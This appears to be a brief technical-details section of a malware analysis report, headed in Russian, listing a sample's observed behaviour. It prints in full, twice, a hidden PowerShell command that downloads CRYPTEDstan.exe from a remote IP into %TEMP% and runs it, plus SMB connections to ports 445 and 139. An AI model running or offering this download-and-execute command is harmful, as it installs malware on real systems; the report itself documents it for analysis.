Техническая информация
- //149.56.65.124/~lanzshlp/lion/cryptedstan.exe как %temp%\\cryptedstan.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('//149.56.65.124/~lanzshlp/LION/CRYPTEDstan.exe','%TEMP%\\CRYPTEDstan.exe') & %TEMP%\\CRYPTEDstan.exe
- '14#.#6.65.124':445
- '14#.#6.65.124':139
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('//149.56.65.124/~lanzshlp/LION/CRYPTEDstan.exe','%TEMP%\\CRYPTEDstan.exe') & %TEMP%\\CRYPTEDstan.exe' (со скрытым окном)